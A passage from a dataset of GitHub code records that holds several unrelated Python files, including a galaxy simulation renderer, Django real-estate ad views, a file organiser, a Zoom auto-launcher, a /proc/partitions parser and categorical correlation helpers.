loop\nclock()\nroot.mainloop()\n","repo_name":"Ashura-Sheikh/TK-Clock","sub_path":"clock.py","file_name":"clock.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"30858769031","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[13]:\n\n\n#Bibliotecas necessárias\nimport configparser\nimport h5py\nimport numpy as np\nimport pynbody\nimport pynbody.plot.sph as sph\nimport matplotlib.pyplot as plt\nfrom sys import argv\n\n'''\ngalmock.py\n\nThis python program adapts hdf5 snapshots of n-body simulations of isolated galaxies that use star formation, such as those from GADGET-4, allowing the plotting of realistic visualizations that take into account metallicity and particle age of the simulated galaxy.\n\nUsage:\npython3 galmock.py [snapshot --hdf5]\n'''\n\n########################################################################\n# cria o objeto ConfigParser\nconfig = configparser.ConfigParser()\n\n# lê o arquivo .ini\nconfig.read('param.ini')\n\n# obtém os valores da seção \"plot\"\nwidth = config.get('plot', 'width')\nresolution = config.getint('plot', 'resolution')\nstarsize = config.getfloat('plot', 'starsize')\ngalrot = config.getint('plot', 'galrot')\n\n# obtém os valores da seção \"filters\"\nr_scale = config.getfloat('filters', 'r_scale')\ng_scale = config.getfloat('filters', 'g_scale')\nb_scale = config.getfloat('filters', 'b_scale')\ndynamic_range = config.getfloat('filters', 'dynamic_range')\n \n# obtém os valores da seção \"disk\"\ndiskp = config.get('disk', 'diskp')\nmetaldisk = config.getfloat('disk', 'metaldisk')\nmin_metaldisk = config.get('disk', 'min_metaldisk')\n########################################################################\n\n# Define ordem do argumento ao iniciar o programa, no caso o argumento é o nome do seu snapshot a ser lido\nsnapshotIn = str(argv[1])\n\n#Atribuindo o do argumento 1 para o título do snapshot escolhido para ser lido pelo h5py\ns = h5py.File(snapshotIn, \"r\")\n\n#lendo as partículas tipo stars do arquivo hdf5\ns_star = s['PartType4']\n\n#importando partículas tipo disk caso existam\nif 'PartType2' in h5py.File(snapshotIn, \"r\"):\n s_disk = s['PartType2']\n\n#importando tempo do snapshot\ns_time = s['Header'].attrs['Time']\n\n#importando informações das partículas tipo stars\nstar_x = np.array(s_star['Coordinates'][:,0])\nstar_y = np.array(s_star['Coordinates'][:,1])\nstar_z = np.array(s_star['Coordinates'][:,2])\nstar_mass = np.array(s_star['Masses'])\nstar_metal = np.array(s_star['Metallicity'])\nstar_age = np.array(s_star['StellarFormationTime'])\n\n#obtendo valores mínimos da idade e metalicidade das partículas 
stars\nstar_min_met = np.min(star_metal)\nstar_min_age = np.min(star_age)\n\n#importando informações das partículas tipo disco caso existam\nif 'PartType2' in h5py.File(snapshotIn, \"r\"): \n disk_x = np.array(s_disk['Coordinates'][:,0])\n disk_y = np.array(s_disk['Coordinates'][:,1])\n disk_z = np.array(s_disk['Coordinates'][:,2])\n disk_mass = np.array(s_disk['Masses'])\n disk_metal = np.array(s_disk['Metallicity'])\n #atribuindo um valor de metalicidade para o disco de acordo com a escolha da variavel min)metaldisk do arquivo param.ini\n if min_metaldisk == 'True':\n for i in range(len(disk_metal)):\n disk_metal[i] += star_min_met\n else:\n for i in range(len(disk_metal)):\n disk_metal[i] += metaldisk\n \n disk_age = np.array(s_disk['StellarFormationTime'])\n for i in range(len(disk_age)):\n disk_age[i] += star_min_age\n\n \n\n#decisão se há concatenação das partículsa tipo disco e stars ou se será considerado apenas estrelas de acordo com a escolha no arquivo param.ini \nif diskp == 'False':\n x = star_x\n y = star_y\n z = star_z\n mass = star_mass\n metal = star_metal\n age = star_age\nelse:\n x = np.concatenate((disk_x, star_x), axis=0)\n y = np.concatenate((disk_y, star_y), axis=0)\n z = np.concatenate((disk_z, star_z), axis=0)\n mass = np.concatenate((disk_mass, star_mass), axis=0)\n metal = np.concatenate((disk_metal, star_metal), axis=0)\n age = np.concatenate((disk_age, star_age), axis=0)\n\n#correção de centro de massa do snapshot\ncom_x = np.sum(x*mass)/np.sum(mass)\ncom_y = np.sum(y*mass)/np.sum(mass)\ncom_z = np.sum(z*mass)/np.sum(mass)\n\nx = (x - com_x)\ny = (y - com_y)\nz = (z - com_z)\n\n\n#atribuindo Sim.Arrays para o pynobdy\nNstars = len(mass)\np = pynbody.snapshot.new(star=int(Nstars))\np.star['pos'] = pynbody.array.SimArray(np.empty((Nstars, 3)), units=\"kpc\")\np.star['mass'] = pynbody.array.SimArray(np.empty((Nstars)), units=\"1.00e+10 Msol\")\np.star['metals'] = pynbody.array.SimArray(np.empty((Nstars)), units=None)\np.star['age'] = pynbody.array.SimArray(np.empty((Nstars)), units=\"Gyr\")\n\np.star['pos'][:,0] = x\np.star['pos'][:,1] = y\np.star['pos'][:,2] = z\np.star['mass'] = mass\np.star['metals'] = metal\np.star['age'] = s_time - age #pequena correção do tempo das partículas para formato esperado pela função do pynbody\np.stars.rotate_x(galrot)\n\n#plotagem\npynbody.plot.stars.render(p, width=width, resolution=resolution, starsize=starsize, r_scale=r_scale, g_scale=g_scale, b_scale=b_scale, dynamic_range=dynamic_range, plot=True)\n\n#salvando arquivo com a imagem gerada e dando nome de acordo com o tempo do snapshot\nplt.savefig('galmock_'+str(\"%.2f\"%s_time)+'.png', bbox_inches='tight', facecolor='white', dpi=300)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Gustavosh23/galmock","sub_path":"galmock.py","file_name":"galmock.py","file_ext":"py","file_size_in_byte":5165,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"19533524828","text":"from datetime import datetime\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect\nfrom django.views.generic import TemplateView\nfrom rest_framework.response import Response\n\nfrom estate_app.core.clean_up_images import clean_up_image_files\nfrom estate_app.core.paginator import create_paginator\nfrom estate_app.core.validator import validate_creator\nfrom estate_app.forms import AdditionalFilterForm, AdForm\nfrom estate_app.models import District, DistrictCity, DistrictCityArea, Ad\nfrom 
estate_app.core.sort_filter import process_filter_input\nfrom rest_framework import views as rest_views\n\nfrom estate_app.serializer import AdSerializer\n\n\nclass AboutUsTemplateView(TemplateView):\n    template_name = 'about_us.html'\n\n\nclass GeneralRulesTemplateView(TemplateView):\n    template_name = 'general_rules.html'\n\n\ndef load_home_page(request):\n    districts = District.objects.all()\n    cities = DistrictCity.objects.all()\n    areas = DistrictCityArea.objects.all()\n    ads = Ad.objects.all()\n\n    context = {\n        'districts': districts,\n        'cities': cities,\n        'areas': areas,\n        'ads': ads,\n    }\n    filterinput = AdditionalFilterForm(request.GET)\n    list_ads = []\n    if filterinput.data.get('reference_number'):\n        ref_num = filterinput.data.get('reference_number')\n        ad = Ad.objects.filter(pk=ref_num, approved=True)\n        if len(ad) > 0:\n            ad[0].can_modify = request.user.is_superuser or ad[0].created_by == request.user\n            list_ads.append(ad[0])\n        context['filterinput'] = filterinput\n    else:\n        context = process_filter_input(request, context, ads, filterinput)\n        list_ads = context['ads']\n    context['page_obj'] = create_paginator(request, list_ads)\n    return render(request, 'home_page.html', context)\n\n\ndef district(request, pk):\n    selected_district = District.objects.get(pk=pk)\n    cities = DistrictCity.objects.filter(district_id=pk)\n    areas = DistrictCityArea.objects.all()\n    ads = Ad.objects.filter(district=selected_district)\n    context = {\n        'district': selected_district,\n        'cities': cities,\n        'areas': areas,\n        'ads': ads,\n    }\n    filterinput = AdditionalFilterForm(request.GET)\n    list_ads = []\n    if filterinput.data.get('reference_number'):\n        ref_num = filterinput.data.get('reference_number')\n        ad = Ad.objects.filter(pk=ref_num, approved=True)\n        if len(ad) > 0:\n            ad[0].can_modify = request.user.is_superuser or ad[0].created_by == request.user\n            list_ads.append(ad[0])\n        context['filterinput'] = filterinput\n    else:\n        context = process_filter_input(request, context, ads, filterinput)\n        list_ads = context['ads']\n    context['page_obj'] = create_paginator(request, list_ads)\n    return render(request, 'district_page.html', context)\n\n\ndef city(request, pk):\n    selected_city = DistrictCity.objects.get(pk=pk)\n    selected_district = District.objects.get(pk=selected_city.district_id)\n    areas = DistrictCityArea.objects.filter(city_id=pk)\n    ads = Ad.objects.filter(district=selected_district, city=selected_city)\n    context = {\n        'district': selected_district,\n        'city': selected_city,\n        'areas': areas,\n        'ads': ads,\n    }\n    filterinput = AdditionalFilterForm(request.GET)\n    list_ads = []\n    if filterinput.data.get('reference_number'):\n        ref_num = filterinput.data.get('reference_number')\n        ad = Ad.objects.filter(pk=ref_num, approved=True)\n        if len(ad) > 0:\n            ad[0].can_modify = request.user.is_superuser or ad[0].created_by == request.user\n            list_ads.append(ad[0])\n        context['filterinput'] = filterinput\n    else:\n        context = process_filter_input(request, context, ads, filterinput)\n        list_ads = context['ads']\n    context['page_obj'] = create_paginator(request, list_ads)\n    return render(request, 'city_page.html', context)\n\n\ndef area(request, pk):\n    selected_area = DistrictCityArea.objects.get(pk=pk)\n    selected_city = DistrictCity.objects.get(pk=selected_area.city_id)\n    selected_district = District.objects.get(pk=selected_city.district_id)\n    ads = Ad.objects.filter(district=selected_district, city=selected_city, area=selected_area)\n    context = {\n        'district': selected_district,\n        'city': selected_city,\n        'area': selected_area,\n        'ads': ads,\n    }\n    
filterinput = AdditionalFilterForm(request.GET)\n    list_ads = []\n    if filterinput.data.get('reference_number'):\n        ref_num = filterinput.data.get('reference_number')\n        ad = Ad.objects.filter(pk=ref_num, approved=True)\n        if len(ad) > 0:\n            ad[0].can_modify = request.user.is_superuser or ad[0].created_by == request.user\n            list_ads.append(ad[0])\n        context['filterinput'] = filterinput\n    else:\n        context = process_filter_input(request, context, ads, filterinput)\n        list_ads = context['ads']\n    context['page_obj'] = create_paginator(request, list_ads)\n    return render(request, 'area_page.html', context)\n\n\ndef show_details(request, pk):\n    ad = Ad.objects.get(pk=pk)\n    if request.user.id != ad.created_by_id:\n        ad.increase_counter_seen()\n        ad.save()\n    context = {\n        'ad': ad,\n    }\n    return render(request, 'details.html', context)\n\n\ndef approve_ad(request, pk):\n    previous_url = request.META.get('HTTP_REFERER')\n    ad_to_approve = Ad.objects.get(pk=pk)\n    ad_to_approve.approved = True\n    ad_to_approve.rejected = False\n    ad_to_approve.comments_reject = ''\n    ad_to_approve.save()\n    return redirect(previous_url)\n\n\ndef reject_ad(request, pk):\n    ad = Ad.objects.get(pk=pk)\n    context = {\n        'ad_to_reject': AdForm(),\n        'ad': ad,\n    }\n    if request.method == \"GET\":\n        return render(request, 'reject_ad.html', context)\n    else:\n        comment = request.POST.get('comments_reject')\n        ad.rejected = True\n        ad.comments_reject = comment\n        ad.save()\n        return redirect('show details', ad.pk)\n\n\n@login_required()\ndef create_ad(request):\n    previous_url = request.META.get('HTTP_REFERER')\n    if request.method == 'GET':\n        ad_form = AdForm()\n        context = {\n            'ad_form': ad_form,\n            'previous_url': previous_url\n        }\n        return render(request, 'create_ad.html', context)\n    else:\n\n        ad_form = AdForm(request.POST, request.FILES or None)\n        if ad_form.is_valid():\n            form = ad_form.save(commit=False)\n            form.created_by = request.user\n            form.save()\n            return redirect('show details', form.id)\n        else:\n            context = {\n                'ad_form': ad_form,\n            }\n            return render(request, 'create_ad.html', context)\n\n\n@login_required()\ndef edit_ad(request, pk):\n    previous_url = request.META.get('HTTP_REFERER')\n    ad_to_edit = Ad.objects.get(pk=pk)\n    validate_creator(ad_to_edit, request.user)\n    if request.method == 'GET':\n        context = {\n            'ad_form': AdForm(instance=ad_to_edit),\n            'reference_number': pk,\n            'previous_url': previous_url\n        }\n        return render(request, 'edit_ad.html', context)\n    else:\n        ad_form = AdForm(request.POST, request.FILES or None, instance=ad_to_edit)\n        if ad_form.is_valid():\n            form = ad_form.save(commit=False)\n            form.date_modified = datetime.now()\n            form.approved = False\n            form.rejected = False\n            form.comments_reject = ''\n            form.save()\n            return redirect('show details', pk)\n        else:\n            context = {\n                'ad_form': ad_form,\n            }\n            return render(request, 'edit_ad.html', context)\n\n\n@login_required()\ndef delete_ad(request, pk):\n    ad_to_delete = Ad.objects.get(pk=pk)\n    validate_creator(ad_to_delete, request.user)\n    clean_up_image_files(ad_to_delete)\n    ad_to_delete.delete()\n    return redirect('home')\n\n\ndef load_cities(request):\n    district_id = request.GET.get('district_id')\n    cities = DistrictCity.objects.filter(district_id=district_id)\n    return render(request, 'city_dropdown_list_options.html', {'cities': cities})\n\n\ndef load_areas(request):\n    city_id = request.GET.get('city_id')\n    areas = DistrictCityArea.objects.filter(city_id=city_id)\n    return render(request, 'area_dropdown_list_options.html', {'areas': areas})\n\n\nclass 
AdListApiView(rest_views.APIView):\n def get(self, request):\n books = Ad.objects.all()\n serializer = AdSerializer(books, many=True)\n return Response(serializer.data)\n\n\n","repo_name":"ZYKoleva/SoftUniPythonWebExamProject","sub_path":"estate_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"18253434495","text":"import matplotlib.pyplot as plt\nimport unittest\n\nfrom christmas.globe import Perlin\n\n\nclass PerlinTest(unittest.TestCase):\n \"\"\"Visual, qualitative test of snowscape generation.\"\"\"\n def test(self):\n grid = Perlin.generate(20, 20, 50)\n plt.imshow(grid, origin='upper')\n plt.show()\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"thewebers/battle","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"72592514371","text":"from pathlib import Path\nfrom collections import Counter\nimport shutil\nfrom src.data import dir_path\nimport json\nimport sys\nfrom src.data.utiles import read_json\n\n\n\nclass orgnizer:\n\n def __init__(self):\n\n self.ext_json = read_json(\"ext.json\")\n \n self.category = {}\n for folder_cat , sufs in self.ext_json.items():\n for suf in sufs:\n self.category[suf] = folder_cat\n\n\n def cleaner(self, directory_path = \"/home/bahram/Downloads\"):\n ext =[]\n for files in Path(directory_path).iterdir():\n #ignores dirs\n if files.is_dir():\n continue\n\n #ignores hidden files\n if files.name.startswith('.'):\n continue\n\n #moves files\n if files.suffix not in self.category:\n folder_path = Path(directory_path)/'others'\n else:\n folder_path = Path(directory_path)/self.category[files.suffix]\n\n folder_path.mkdir(exist_ok = True)\n shutil.move(str(files) , str(folder_path))\n print(f'{files.suffix:10}{folder_path}')\n ext.append(files.suffix)\n print('done')\n\nif __name__ == \"__main__\":\n c1 = orgnizer()\n c1.cleaner(sys.argv[1])","repo_name":"BahramRoohandeh/Directory_orgnize","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"34952502489","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 15 01:11:39 2018\n\n@author: Administrator\n\"\"\"\nimport numpy as np\nimport random\nimport time\n\ndef bucket_sort(V,E):\n\n#V: the list to be sorted\n#E: the size of each bucket\n\n#Prepare for the buckets\n numBucket = len(V)//E+1\n B = []\n for i in range(numBucket):\n B.append([])\n#put each item into the corresponding bucket\n for x in V:\n B[ int(numBucket*x) ].append(x)\n#sort the items in the buckets by turns \n for i in range(len(B)):\n B[i].sort()\n \n j = 0\n for i in range(len(B)):\n for x in B[i]:\n V[j] = x\n j += 1\n return 0\n\n\nif __name__ == '__main__':\n start = time.time()\n V = []\n for i in range(5000000):\n V.append(random.uniform(0,1))\n print(\"Time of generating the numbers\",time.time()-start)\n \n start = time.time()\n# print(V)\n# V.sort()\n bucket_sort(V,5)\n# print(V)\n print(\"Time of sorting\",time.time()-start)\n \n \n ","repo_name":"melodyoh/algorithm_planet","sub_path":"bucket_sort.py","file_name":"bucket_sort.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} 
+{"seq_id":"36045250435","text":"import datetime as dt\nfrom datetime import datetime\nimport subprocess\n\n# Equivalência de datas\n# 0 -> Segunda\n# 1 -> Terça\n#... -> ...\n# 5 -> Sexta\n\nzoomIdsByWeekdayAndHour = {\n\t'0A':'',\n\t'0B':'',\n\t'1A':'',\n\t'1B':'',\n\t'2A':'',\n\t'2B':'',\n\t'3AP':'',\n\t'3AI':'',\n\t'3BP':'98665096620',\n\t'3BI':'',\n\t'4A':'',\n\t'4B':''\n}\n\ntoday = dt.datetime.now()\ntodayWeekday = dt.datetime.today().weekday()\nweekofYear = dt.datetime.now().isocalendar()[1]\ntodayDay = today.day\nhourNow = today.hour\nminuteNow = today.minute\n\n\nif hourNow>=22:\n\tprint('Não há mais aulas para hoje :D')\n\tinput('Pressione qualquer tecla para continuar')\n\texit()\n\nif hourNow <20 or (hourNow == 20 and minuteNow <25):\n\taux = 'A'\nelse:\n\taux = 'B'\n\nif todayWeekday == 3 :\n\tif(weekofYear % 2 == 0):\n\t\taux+='P'\n\telse:\n\t\taux+='I'\n\ntry:\n\tclassId = zoomIdsByWeekdayAndHour[f'{todayWeekday}{aux}']\n\tprint('Abrindo aula...')\n\tsubprocess.call(['%AppData%\\\\Zoom\\\\bin\\\\Zoom.exe', f\"--url=zoommtg://zoom.us/join?action=join^&confno={classId}\"], shell=True)\n\nexcept:\n\tprint('Não há aula cadastrada para o dia de hoje!')\n\tinput('Pressione qualquer tecla para continuar')\n","repo_name":"ItaloPussi/pythonProjects","sub_path":"autoZoom/autoZoom.py","file_name":"autoZoom.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"13070840065","text":"#!/usr/bin/env python3\n\nfrom .proc_base import ProcBase\n\n\nclass ProcPartitions(ProcBase):\n '''Object represents the /proc/partitions file.'''\n\n table_header_str = 'Name major/minor ID # KB blocks'\n format_str = '{0:4} {1:>3}.{2:<13} {3:}'\n\n def __init__(self):\n '''\n Read file by calling base class constructor\n then parse the contents.\n '''\n super().__init__('/proc/partitions')\n self.partitions = []\n self.read()\n\n def read(self):\n '''Parses contents of /proc/partitions'''\n for line in self.content.split('\\n')[1:]:\n tokens = line.split()\n if not tokens:\n continue\n\n major = 0\n minor = 0\n blocks = 0\n name = None\n\n if tokens[0] and tokens[0].isdigit():\n major = int(tokens[0])\n\n if tokens[1] and tokens[1].isdigit():\n minor = int(tokens[1])\n\n if tokens[2] and tokens[2].isdigit():\n blocks = int(tokens[2])\n\n if tokens[3]:\n name = tokens[3]\n\n self.partitions.append((major, minor, blocks, name))\n\n def dump(self):\n '''Print information gathered to stdout.'''\n super().dump() # Print file header\n\n print('Major devices with the same number are all '\n 'controlled by the same driver.')\n print('For all SCSI drivers this is 8.\\n')\n print(self.table_header_str)\n print(len(self.table_header_str) * '-')\n\n for (major, minor, blocks, name) in self.partitions:\n print(self.format_str.format(name, major, minor, blocks))\n","repo_name":"EwanC/pyProc","sub_path":"proc_scraper/proc_partitions.py","file_name":"proc_partitions.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"18545399064","text":"'''A wrapper for some useful categorical correlation/association metrics.'''\n\nfrom itertools import combinations, permutations\nfrom typing import List, Tuple\n\nimport pandas as pd\nimport numpy as np\nfrom scipy.stats.contingency import association\nfrom dython.nominal import theils_u\n\n\ndef get_categorical_corr(\n data: pd.DataFrame,\n features: List[str] = None,\n method: str = 
'cramer',\n thr: float = 0.5\n) -> Tuple[pd.DataFrame, dict]:\n \"\"\"\n Given a dataframe and a list of categorical features, returns a correlation\n matrix, with correlation values for every feature pair. Along with the\n correlation matrix, a dictionary linking each feature that has a\n correlation with any other feature higher\n than `thr` value is also returned.\n\n Parameters\n ----------\n data: pd.DataFrame\n A DataFrame with categorical features of interest.\n features: List[str], optional, default=data.columns\n A list with feature names. If none is provided, will use all the\n columns in `data`.\n method: str, optional, default='cramer'\n The association metric to be used. Available methods:\n - 'cramer' (Cramer's V)\n - 'tschuprow' (Tschuprow's T)\n - 'pearson' (Pearson Contingency Value)\n - 'theil' (Theil's U assymetric association value)\n thr: float, optional, default=0.5\n A threshold value to return the correlated features dictionary.\n\n Returns\n -------\n The correlation matrix itself and the correlated features dictionary,\n as a tuple.\n \"\"\"\n if not isinstance(data, pd.DataFrame):\n raise TypeError(\"'data' should be a pd.DataFrame.\")\n if features is None:\n features = list(data.columns)\n if not isinstance(features, list):\n raise TypeError(\"'features' should be a list with feature names.\")\n if any(not isinstance(feature, str) for feature in features):\n raise TypeError(\"All elements inside 'features' should be strings.\")\n if method not in ['cramer', 'tschuprow', 'pearson', 'theil']:\n raise TypeError(\"Unexpected method provided.\")\n if not isinstance(thr, float):\n raise TypeError(\"'thr' should be a float value.\")\n\n if method != 'theil':\n output = get_symmetrical_metric(data[features], method)\n else:\n output = get_asymmetrical_metric(data[features], method)\n\n # finding features that have any metric greater than 'thr'\n high_corr = [\n x for x in features if any(np.greater(output[x].drop(x, axis=0), thr))\n ]\n corr_features = {}\n features = np.array(features)\n for var in high_corr:\n cond = np.greater(output[f'{var}'], thr)\n not_itself = features != var\n corr_features[f'{var}'] = features[np.where(cond & not_itself)]\n\n return output, corr_features\n\n\ndef get_symmetrical_metric(data: pd.DataFrame, method: str) -> pd.DataFrame:\n \"\"\"\n Given a dataframe and a list of categorical features, returns a correlation\n matrix, with correlation values for every feature pair.\n\n Parameters\n ----------\n data: pd.DataFrame\n A DataFrame with categorical features of interest.\n method: str\n The association metric to be used. 
Available symmetrical methods:\n - 'cramer' (Cramer's V)\n - 'tschuprow' (Tschuprow's T)\n - 'pearson' (Pearson Contingency Value)\n\n Returns\n -------\n A correlation matrix.\n \"\"\"\n\n # result will be a n_features by n_features symmetric matrix\n # so we initialize it as an identity matrix\n output = pd.DataFrame(\n np.eye(len(data.columns)),\n columns=data.columns,\n index=data.columns\n )\n\n # because these metrics are symmetric, we only need half\n # of the pair-wise combinations\n combs = combinations(data.columns, r=2)\n # for every pair, we calculate its contingency based association.\n for comb in combs:\n feat_a = comb[0]\n feat_b = comb[1]\n\n # use crosstab to find the contingency table between features\n input_tab = pd.crosstab(data[feat_a], data[feat_b])\n res = association(input_tab, method=method, correction=True)\n\n output[feat_a][feat_b], output[feat_b][feat_a] = res, res\n\n return output\n\n\ndef get_asymmetrical_metric(data: pd.DataFrame, method: str) -> pd.DataFrame:\n \"\"\"\n Given a dataframe and a list of categorical features, returns a correlation\n matrix, with correlation values for every feature pair.\n\n Parameters\n ----------\n data: pd.DataFrame\n A DataFrame with categorical features of interest.\n method: str\n The association metric to be used. Available asymmetrical methods:\n - Theil's U\n\n Returns\n -------\n A correlation matrix.\n \"\"\"\n # result will be a n_features by n_features symmetric matrix\n # so we initialize it as an identity matrix\n output = pd.DataFrame(\n np.eye(len(data.columns)),\n columns=data.columns,\n index=data.columns\n )\n\n # because these metrics are asymmetric, we need all\n # of the pair-wise combinations\n combs = permutations(data.columns, r=2)\n # for every pair, calculate theil U.\n for comb in combs:\n feat_a = comb[0]\n feat_b = comb[1]\n\n output[feat_a][feat_b] = theils_u(\n data[feat_a],\n data[feat_b]\n )\n\n return output\n","repo_name":"eduardokapp/categorical_correlation","sub_path":"cat_corr/cat_corr.py","file_name":"cat_corr.py","file_ext":"py","file_size_in_byte":5483,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"16353323324","text":"from faceTrain import train\nimport os\nimport numpy as np\nimport cv2 as cv\n\nDIR = r'C:\\Users\\JoseAtlin\\Desktop\\local_repo\\openCV\\validate'\npeople = [p for p in os.listdir(DIR)]\n\nfeatures = np.load('features.npy', allow_pickle=True)\nlabels = np.load('labels.npy', allow_pickle=True)\n\nfaceRecognizer = cv.face.LBPHFaceRecognizer_create()\nfaceRecognizer.read('faceTrained.yml')\n\nimage = cv.imread(r'C:\\Users\\JoseAtlin\\Desktop\\local_repo\\openCV\\validate\\Neymar jr\\Neymar.jpg')\ngray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n\nhaarCascade = cv.CascadeClassifier('haarFace.xml')\nfaceDetect = haarCascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=3)\nfor (x, y, w, h) in faceDetect:\n faceROI = gray[y:y + h, x:x + w]\n\n label, confidence = faceRecognizer.predict(faceROI)\n print(f'Label = {people[label]} with confidence of {confidence}')\n\n cv.putText(image, str(people[label]), (20, 20), cv.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 255), thickness=1)\n cv.rectangle(image, (x, y), (x + w, y + h), (0, 0, 255), thickness=1)\n\ncv.imshow('detected Face', 
image)\ncv.waitKey(0)","repo_name":"JoseAtlin/computerVision","sub_path":"faceDetection.py","file_name":"faceDetection.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"31484597535","text":"\"\"\"\nBase tools for defining field types.\n\"\"\"\n\n__all__ = [\n \"FieldType\",\n \"Axes\",\n]\n\nimport re\nfrom types import MappingProxyType\nfrom collections import OrderedDict\n\n\nclass FieldType(type):\n \"\"\"\n Metaclass for the field types.\n Field types are special classes used to define properties of fields\n depending on the axes.\n\n Field types have the following restrictions\n - The name of the class must be **unique**. All the field\n types are stored in dictionary (FieldType.s) and this list is\n looked up for searching properties of the field.\n - The FieldType needs to define an attribute __axes__ to specify\n which axes are needed for the properties of the type.\n\n\n Behaviour of field type special attributes:\n __axes__: list of axes that identify the field type.\n One can use generic names as \"dims\", \"dofs\" or properties\n like \"space\" or any of the special dimensions that may\n be defined on the lattice. If the current lattice does not\n have dimensions with these names, the field type will be simply\n ignored.\n Special characters may follow the name of the dimension as\n \"+\", \"!\"...\n The \"+\" means that the dimension can appear more than once.\n If a dimension is not followed by any special character then\n the \"+\" behavious is applied; e.g. \"dims\" -> \"dims+\".\n The \"!\" means that the specific dimension can be repeated only\n once. E.g. \"spin!\" means that only one spin dimension must be\n present to be of this type. Repetition of the dimension with\n \"!\" increase the counter, e.g. [\"spin!\", \"spin!\"] = \"spin!!\"\n means that the spin dimension must appear twice to be of the type.\n When \"!\" is used for a group of dimensions, i.e. \"dofs!\" then\n means that all the dofs must appear and only once. 
Then\n [\"dofs!\", \"dofs\"] = \"dofs!+\" means that all the dofs must appear\n but repetitions are allowed.\n\n - __init__ =\n \"\"\"\n\n __types__ = OrderedDict()\n s = MappingProxyType(__types__)\n BaseField = None\n Field = None\n\n @classmethod\n def __prepare__(cls, name, bases, **kwargs):\n \"\"\"\n Checks that the name of the class is unique and construct from\n the axes in the base classes (bases) the axes for the new class.\n \"\"\"\n assert not kwargs, \"kwargs not used\"\n assert name not in cls.__types__, \"A FieldType named %s already exists\" % name\n\n axes = Axes()\n for base in bases:\n if isinstance(base, FieldType):\n axes += base.axes\n\n return {\"__axes__\": axes}\n\n def __new__(cls, name, bases, attrs, **kwargs):\n \"Checks that __axes__ is a valid Axes\"\n assert not kwargs, \"kwargs not used\"\n\n assert \"__axes__\" in attrs\n attrs[\"__axes__\"] = Axes(attrs[\"__axes__\"])\n return super().__new__(cls, name, bases, attrs)\n\n def __init__(cls, name, bases, attrs, **kwargs):\n \"\"\"\n Adds the class to the list of all FieldType and checks\n that is subclass of bases.\n \"\"\"\n assert not kwargs, \"kwargs not used\"\n\n for base in bases:\n assert issubclass(\n cls, base\n ), \"\"\"\n The axes defined in the class %s are not compatible\n with the parent class %s.\n Axes of %s: %s\n Axes of %s: %s\n \"\"\" % (\n cls,\n base,\n cls,\n cls.axes,\n base,\n base.axes,\n )\n\n FieldType.__types__[name] = cls\n FieldType.__types__.move_to_end(name, last=False)\n super().__init__(name, bases, attrs)\n\n def __call__(cls, *args, **kwargs):\n \"Returns a Field with the correct axes\"\n return cls.Field(*args, axes=kwargs.pop(\"axes\", cls.axes.expand), **kwargs)\n\n def __subclasscheck__(cls, child):\n \"Checks if child is subclass of class\"\n return isinstance(child, FieldType) and cls.axes in child.axes\n\n def __instancecheck__(cls, field):\n \"Checks if field is compatible with the class\"\n if not isinstance(field, cls.BaseField):\n return False\n if cls.axes.labels not in field.lattice:\n return False\n axes = list(field.axes)\n for axis in field.lattice.expand(cls.axes.must):\n if axis not in axes:\n return False\n axes.remove(axis)\n axes = set(axes)\n for axis in cls.axes.may:\n if not axes.intersection(field.lattice.expand(axis)):\n return False\n return True\n\n @property\n def axes(cls):\n return cls.__axes__\n\n\nclass Axes(tuple):\n \"\"\"\n Functionalities to parse the axes.\n \"\"\"\n\n _get_label = re.compile(r\"[a-zA-Z]([a-zA-Z0-9]|_[0-9]*[a-zA-Z])*\")\n\n @classmethod\n def get_label(cls, key):\n return cls._get_label.match(key)[0]\n\n _get_count = re.compile(\n # r\"([\\+\\!\\?\\*]|({([0-9]+,?)+(,...)?}))?$\"\n r\"[\\!]*[\\+]?$\"\n )\n\n @classmethod\n def get_count(cls, key):\n return cls._get_count.search(key)[0]\n\n _check_key = re.compile(_get_label.pattern + _get_count.pattern)\n\n @classmethod\n def check_keys(cls, keys):\n for key in keys:\n if not cls._check_key.match(key):\n raise KeyError(\"Invalid key: %s.\" % key)\n\n def __new__(cls, axes=()):\n if isinstance(axes, cls):\n return axes\n\n if isinstance(axes, str):\n axes = (axes,)\n\n cls.check_keys(axes)\n\n tmp = dict()\n for axis in axes:\n clean = cls.get_label(axis)\n sym = \"!\" * axis.count(\"!\") + tmp.get(clean, \"\")\n if axis == clean or axis[-1] == \"+\":\n if sym.endswith(\"+\"):\n sym = sym[:-1] + \"!\"\n sym += \"+\"\n tmp[clean] = sym\n\n axes = tuple((key + val for key, val in tmp.items()))\n\n return super().__new__(Axes, axes)\n\n def __add__(self, axes):\n return 
